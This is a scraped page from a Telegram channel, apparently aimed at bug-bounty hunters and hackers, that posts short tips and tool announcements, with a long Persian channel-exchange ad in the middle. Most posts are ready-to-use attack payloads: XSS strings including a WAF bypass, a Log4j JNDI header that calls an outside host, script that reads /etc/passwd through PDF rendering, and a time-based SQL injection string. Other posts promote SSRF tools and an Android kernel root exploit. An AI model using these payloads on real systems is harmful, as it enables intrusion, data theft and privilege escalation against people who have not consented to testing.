BugCod3
Open in Telegram
[ BugCod3 ] — From Shadows To Shells ⚡️ 🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools ⚔️ Learn • Hunt • Dominate 👥 Group: T.me/BugCod3GP 📂 Topic: T.me/BugCod3Topic 🌐 Web: BugCod3.com 🤖 Contact: T.me/BugCod3BOT 📧 Email: BugCod3@protonmail.com
Show more7 264
Subscribers
-1024 hours
-17 days
+43830 days
Posts Archive
7 263
Algolia AppId+API-KEY PoC to show permissions:
curl "https://[APP-ID]-dsn.algolia.net/1/keys/[APPKEY]?x-algolia-application-id=[APP-ID]&x-algolia-api-key=[ApiKey]"
If ACL is Search only, it's likely to be a P5, if it has other sensitive permissions.. it's a P1/P2
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
⛓ T.me/BugCod3Topic
📣 T.me/BugCod37 263
Form Finder
This script can be used to find HTML forms in the list of endpoints/URLs.
Usage:
python3 formfinder.py endpoints.txt
😸 Github
⬇️ Donwload
🔒 BugCod3
#Python #Form #Finder
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
⛓ T.me/BugCod3Topic
📣 T.me/BugCod37 263
DOM-XSS-SiteMinder
Payload:
\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
📞 Nuclei Template
#XSS #DOM
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
⛓ T.me/BugCod3Topic
📣 T.me/BugCod37 263
hackerone-reports
Top disclosed reports from HackerOne
Tops of HackerOne reports. All reports' raw info stored in
data.csv. Scripts to update this file are written in Python 3 and require chromedriver and Chromium executables at PATH. Every script contains some info about how it works. The run order of scripts:
1. fetcher.py
2. uniquer.py
3. filler.py
4. rater.py
Github
⬇️ Download
🔓 BugCod3
#BugBounty #Reports #HackeOne
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
httprebind
Automatic tool for DNS rebinding-based SSRF attacks
Installation:
sudo pip install dnslib flask flask_cors
Usage:
sudo python httprebind.py domain.name serverIp mode
Where mode is one of: ec2, ecs, gcloud
Make sure you point your domain's nameservers to the server indicated by serverIp, and that that IP is the external address of the server, IPv4.
Github
⬇️ Download
🔓 BugCod3
#Python #DNS #SSRF #Attack
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
SSRF Proxy
SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
Once configured, SSRF Proxy attempts to format client HTTP requests appropriately for the vulnerable server. Likewise, the server's response is parsed and formatted for the client.
By correctly formatting the client request and stripping unwanted junk from the response it is possible to use SSRF Proxy as a HTTP proxy for web browsers, proxychains, and scanning tools such as sqlmap, nmap, dirb and nikto.
SSRF Proxy also assists with leveraging blind SSRF vulnerabilities to perform time-based attacks, such as blind time-based SQL injection with sqlmap.
Requirements:
Ruby 2.2.2 or newer.
Ruby Gems:
celluloid-io
webrick
logger
colorize
ipaddress
base32
htmlentities
socksify
mimemagic
Installation:
gem install ssrf_proxy
Usage (command line):
ssrf-proxy [options] -u <SSRF URL>
ssrf-proxy -u http://target/?url=xxURLxxGithub ⬇️ Download 🔓
BugCod3
#Ruby #Proxy #SSRF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
java2S3 Amazon S3 Bucket Enumeration Tool
Introduction:
This Python script automates the enumaration of S3 Buckets referenced in a subdomain's javascript files. This allows the bug bounty hunter to check for security misconfigurations and pentest Amazon S3 Buckets.
Features:
⚪️ Fetches HTTP status codes for subdomains
⚪️ Retrieves JavaScript URLs associated with each subdomain
⚪️ Identifies Amazon S3 buckets in the content
Getting Started:
Prerequisites:
Python 3.x
Install required libraries:
pip install requests
Usage:
Create a text file (input.txt) containing a list of subdomains (one per line).
python js2s3.py input.txt example.com output.txt
Github
⬇️ Download
🔓 BugCod3
#Python #Amazon #S3 #Buckets
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
Mali GPU Kernel LPE
Android 14 kernel exploit for Pixel7/8 Pro
This article provides an in-depth analysis of two kernel vulnerabilities within the Mali GPU, reachable from the default application sandbox, which I independently identified and reported to Google. It includes a kernel exploit that achieves arbitrary kernel r/w capabilities. Consequently, it disables SELinux and elevates privileges to root on Google Pixel 7 and 8 Pro models running the following Android 14 versions:
Pixel 8 Pro:
google/husky/husky:14/UD1A.231105.004/11010374:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231105.003/11010452:user/release-keys
Pixel 7 Pro: google/cheetah/cheetah:14/UP1A.231005.007/10754064:user/release-keys
Pixel 7: google/panther/panther:14/UP1A.231105.003/11010452:user/release-keys
Vulnerabilities:
This exploit leverages two vulnerabilities: an integer overflow resulting from an incomplete patch in the gpu_pixel_handle_buffer_liveness_update_ioctl ioctl command, and an information leak within the timeline stream message buffers.
Github
⬇️ Download
🔓 BugCod3
#C #Exploit #Android #Kernel #Pixel
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
The bots are off until further notice
#Notification
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
7 263
Easy P1 🔥
Add to your wordlist
/ganglia/
/ganglia/?c=ElastiCluster&m=load_one&r=hour&s=by%20name&hc=4&mc=2
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
Log4j 🙌 Application was running java
Vulnerable header :
X-Forwarded-For: ${jndi:ldap://${:-874}${:-705}.${hostName}.xforwardedfor.<Server-link>}
#BugBounty #Tips #Security
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
Akamai WAF bypass XSS
<input id=b value=javascrip>
<input id=c value=t:aler>
<input id=d value=t(1)>
<lol
contenteditable
onbeforeinput='location=b.value+c.value+d.value'>
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
If you are testing API, before fuzzing observe these:
1. Does it throw same data for /v1/user and /v1/user
2. Is it case sensitive?
/v1/user => 200 OK
/v1/USER => 200 OK
OR
/v1/user => 200 OK
/v1/User => 404
How is the naming convention used? user_groups or userGroups , etc then you can build your fuzzing wordlist according to this data, but there are always exceptions.
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
7 263
┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *1402
┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 1403
#Notification #NewYear
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
Repost from 🔴 تبادلات کانال آیسان 🔴
🔵 فیلترشکن اورجینال بدون قطعی و قیمت مناسب
✅ https://t.me/+qfktSGvdB-UzZDI8
🔻🔻🔻🔻🔻🔻
👨🎓کلاس: برنامه نویسی
📚درس: برنامه نویسی در اندروید
🎒@programmer_best
➖➖➖➖➖➖➖➖
👨🎓کلاس: طراحی کانسبت
📚درس:آموزش طراحی کانسبت
🎒@khanememaran
➖➖➖➖➖➖➖➖
👨🎓کلاس: فتوشاپ
📚درس: ترفندهای طلایی فتوشاپ
🎒@Arch_referece
➖➖➖➖➖➖➖➖
👨🎓کلاس: زبان انگلیسی
📚درس: اصطلاحات و لغات انگلیسی
🎒@en_nossraat
➖➖➖➖➖➖➖➖
👨🎓کلاس :اتوکد و طراحی
📚درس: آموزش اتوکد و ضوابط
🎒@AutoCAD20
➖➖➖➖➖➖➖➖
👨🎓کلاس: آموزش کسب درآمد دلاری
📚درس: آموزش یوتیوب
🎒@ardavansite
➖➖➖➖➖➖➖➖
👨🎓کلاس: نقشه ساختمان
📚درس:نقشه ساختمان و طراحی
🎒@memarepaedar
➖➖➖➖➖➖➖➖
👨🎓کلاس: مهندسی عمران محاسب
📚درس: عمران و معماری نظارت و جرا و محاسبات
🎒@mohasebanVAnazeraneATi
➖➖➖➖➖➖➖➖
👨🎓کلاس : طراحی معماری نظام مهندسی
📚درس : آموزش صفر تا صد طراحی
🎒@madsland
➖➖➖➖➖➖➖➖
👨🎓کلاس: برنامه نویسی
📚درس: کلاب برنامه نویسان
🎒@shhetab_ir
➖➖➖➖➖➖➖➖
👨🎓کلاس: مهندسی عمران محاسب
📚درس: سوالات تالیفی آزمون محاسبات
🎒@CivilmohasebAskary
➖➖➖➖➖➖➖➖
👨🎓کلاس: اینستاگرام
📚درس: آموزش ورود به اکسپلور
🎒@mini_hodhod
➖➖➖➖➖➖➖➖
👨🎓کلاس: فیلترشکن
📚درس: ساخت V2ray رایگان
🎒@v2rayenn
➖➖➖➖➖➖➖➖
👨🎓کلاس: کتابخونه
📚درس: تجربه اندیشمندان
🎒@Titan_Book
➖➖➖➖➖➖➖➖
👨🎓کلاس: کامپیوتر موبایل
📚درس: ترفند و برنامه های موبایل و کامپیوتر
🎒@RepairMobile_ir
➖➖➖➖➖➖➖➖
👨🎓کلاس: فیلترشکن
📚درس: اشتراک فیلترشکن با سرعت نور
🎒@v2ovan
➖➖➖➖➖➖➖➖
👨🎓کلاس: عکاسی
📚درس: آموزش عکاسی با دوربین موبایل
🎒@MiniPackBax
➖➖➖➖➖➖➖➖
👨🎓کلاس: ایزی گیم
📚درس: گیمپلی، مود و آموزش
🎒@EasyGamey
➖➖➖➖➖➖➖➖
🧑🎓کلاس: رنه سینانی
📚درس: ۱۲ستون پولسازی
🎒@soton_polsazi
➖➖➖➖➖➖➖➖
👨🎓کلاس: دروس معارف دانشگاه
📚درس: پاسخ آزمون های نهاد رایگاااااااان
🎒@nahad_channel
➖➖➖➖➖➖➖➖
👨🎓کلاس : طراحی لوگو
📚درس : خدمات گرافیکی به صورت حرفه ای
🎒 @Mr_Graphicss1
➖➖➖➖➖➖➖➖
👨🎓کلاس: ترکی استانبولی
📚درس: لغت،آموزش و .....
🎒@turkdiile1
➖➖➖➖➖➖➖➖
👨🎓کلاس: موسقی
📚درس: آموزش گیتار کلاسیک
🎒@One_TM_Music
➖➖➖➖➖➖➖➖
🧑🎓کلاس: زبان انگلیسی
📚درس: اصطلاحات، گرامر، نکات کلیدی، لغات
🎒@zabban2024
➖➖➖➖➖➖➖➖
👨🎓کلاس: ادیت با موبایل
📚درس: طراحی با موبایل | موبایل گرافی
🎒@IstgaheGraphic
➖➖➖➖➖➖➖➖
👨🎓کلاس: فیلترشکن
📚درس: پایان محدودیت ها با فلایم نت
🎒@FlaimeNet
➖➖➖➖➖➖➖➖
🧑🎓کلاس: آموزش ادیت کیبورد
📚درس: انواعی آموزش ، ادیت ، ساختن.
🎒@Edit_Keyboard86
➖➖➖➖➖➖➖➖
👨🎓کلاس: تکنولوژی
📚درس: اخبار به روز تکنولوژی
🎒@one_grooup
➖➖➖➖➖➖➖➖
👨🎓کلاس: فیلم
📚درس: فیلم های بدون سانسور
🎒@iranbestfilmnet
➖➖➖➖➖➖➖➖
👨🎓کلاس: تدوین
📚درس: تدوین ویدیو و ساخت کلیپ
🎒@mrmiixcom
➖➖➖➖➖➖➖➖
👨🎓کلاس: پکیج
📚درس: پکیج های پولی رو رایگان دانلود کن
🎒@Royal430
➖➖➖➖➖➖➖➖
👨🎓کلاس: هوش مصنوعی
📚درس: معرفی رایگان ابزار هوش مصنوعی
🎒@persianTeamChannel
➖➖➖➖➖➖➖➖
👨🎓کلاس: Hacking and security
📚درس: آموزش 0 تا 100 کار با ابزار و هک و امنیت
🎒@BugCod3
➖➖➖➖➖➖➖➖
👨🎓کلاس: 3DMax
📚درس: آموزش 0 تا 100 3D
🎒@tdmax_vray
➖➖➖➖➖➖➖➖
👨🎓کلاس: هوش مصنوعی
📚درس: رایگان متخصص هوش مصنوعی شو
🎒 @parsinfotech
➖➖➖➖➖➖➖➖
🧑🎓کلاس: کیبورد فونت نویس
📚درس: انواع کیبورد ، فونت نویس ، فارسی و انگلیسی.
🎒@Ali_Editor86
➖➖➖➖➖➖➖➖
👨🎓کلاس: هوش مصنوعی
📚درس: هوش مصنوعی | علم داده | پایتون
🎒@AILearnCamp
➖➖➖➖➖➖➖➖
👨🎓کلاس : اموزش اتوکد
📚درس: اتوکد و طراحی داخلی
🎒@autocad3d0
➖➖➖➖➖➖➖➖
👨🎓کلاس : زبان انگلیسی
📚درس : فیلم و انیمیشن زیرنویس انگیسی
🎒@zabanhive
➖➖➖➖➖➖➖➖
👨🎓کلاس : طراحی داخلی
📚درس : آموزش طراحی داخلی
🎒@memarshahabi
➖➖➖➖➖➖➖➖
👨🎓کلاس: اصول پایه ادیت
📚درس: آموزش ادیت های اکسپلوری اینستاگرام
🎒@hodhod_delta
➖➖➖➖➖➖➖➖
👨🎓کلاس: دکوراسیون
📚درس: ایده های دکوراسیون داخلی
🎒@Design_groooup
➖➖➖➖➖➖➖➖
🆔 @baTabadolateAysan
.
7 263
XSS to Exfiltrate Data from PDFs
<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>
How to use:
Server Side XSS (Dynamic PDF)
#XSS #PDF
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
For 0Day SQLI in
(app extension)
payload was:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod37 263
LFI Vulnerability Testing: Key Parameters
?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}
#BugBounty #infosec
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
7 263
Translate JavaScript to other writing systems!
Site
ΔYロIᗐコΞ 👾
➖➖➖➖➖➖➖➖➖➖
👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Available now! Telegram Research 2025 — the year's key insights 
